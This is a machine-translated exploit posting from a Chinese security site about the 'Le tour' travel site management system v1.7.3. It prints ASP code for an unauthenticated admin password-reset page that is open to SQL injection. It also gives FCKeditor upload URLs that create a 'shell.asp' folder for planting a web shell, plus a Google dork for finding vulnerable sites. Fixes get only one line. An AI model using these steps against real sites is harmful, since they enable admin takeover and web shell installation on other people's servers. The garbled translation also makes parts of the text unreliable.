Le tour travel site management system v1. 7. 3 xday-vulnerability warning-the black bar safety net

ID MYHACK58:62201026731
Type myhack58
Reporter 佚名
Modified 2010-04-15T00:00:00


The exploit procedure: First: The administrator directory under Admin_Passod. asp

<!--# include file="../Include/conn. asp" - > <!--# include file="../Include/md5. asp" - > <% select case request. QueryString("Action") case "ModifyPass" SaveNewPass case else end select set rs = server. createobject("adodb. recordset") sql="select * from Lelv_w_manage order by id desc" rs. open sql,conn,1,3 AdminName=rs("AdminName") rs. close %> function SaveNewPass() dim LoginName,rs,sql LoginName=request("AdminName") set rs = server. createobject("adodb. recordset") sql="select * from Lelv_w_manage where AdminName=’"&LoginName&"’" rs. open sql,conn,1,3 if rs. bof and rs. eof then response. write "Read the database record go wrong!" response. end else if len(trim(Request. Form("NewPassword")))<6 or len(trim(Request. Form("NewPassword")))>2 0 then response. write "<script language=javascript> alert(’admin password required, and the number of characters is 6-2 0!’); history. back(-1);</script>" response. end end if if Request. Form("NewPassword")<>Request. Form("vNewPassword") then response. write "<script language=javascript> alert(’two times to input password!’); history. back(-1);</script>" response. end end if rs("Password")=Md5(Request. Form("NewPassword")) rs. update rs. close This file is used to modify the password. But the author is not on this file do access restrictions. So we can use it to modify the administrator password. The use method is very simple: References http://localhost/admin/Admin_Passod.asp Second: FCK upload vulnerability, recently see a lot of programs the existence of this vulnerability. References http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell. asp&NewFolderName=z&uuid=1 2 4 4 7 8 9 9 7 5 6 8 4 http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector. asp

The official website does not exist to the first question, one is to modify the background path, the second is delete that file. In Google enter keyword: inurl:Plan_Show. asp? InfoId=